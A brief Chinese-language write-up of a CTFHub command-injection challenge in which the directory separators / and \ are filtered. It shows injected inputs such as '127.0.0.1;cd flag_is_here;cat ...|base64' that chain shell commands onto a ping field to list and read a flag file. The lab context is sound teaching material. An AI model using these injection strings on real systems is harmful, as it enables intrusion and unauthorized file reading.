CTFHub-RCE 命令注入-过滤目录分隔符
-
观察源代码
- 代码里面可以发现过滤了目录分隔符\和/
-
判断是Windows还是Linux
- 源代码中有
说明是Linuxping -c 4
- 源代码中有
-
查看有哪些文件
-
127.0.0.1|ls
-
-
打开flag文件
- 发现存在一个flag_is_here的文件夹,我们需要打开这个文件夹找到目标文件
- 我们尝试分步,先利用cd进入该文件夹,再ls查看有哪些文件
127.0.0.1;cd flag_is_here;ls - 再cat这个php文件
- 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
- 我们尝试用base64编码
127.0.0.1;cd flag_is_here;cat flag_277821912323639.php|base64 - 再将内容base64 解码一下
- 成功获取flag